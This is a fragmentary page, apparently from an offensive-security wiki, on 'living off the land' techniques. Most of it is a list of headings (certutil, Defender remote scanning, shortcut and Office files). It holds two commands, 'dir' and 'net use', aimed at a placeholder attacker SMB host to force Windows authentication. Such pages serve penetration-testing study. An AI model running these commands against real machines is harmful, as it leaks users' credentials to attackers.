🛠️Living off the land
Theory
Practice
Command execution
dir \\$ATTACKER_IP\something
net use \\$ATTACKER_IP\somethingMS-SQL queries execution
File explorer
Internet browser
HTML documents / XSS
Web server file inclusion
Windows Defender Remote Scanning
Certutil
Trend Micro Remote Scanning
Shortcut files (scf, lnk, url)
PDF documents
RTF documents
MS Word documents
Lock screen wallpaper
Resources
Last updated
Was this helpful?

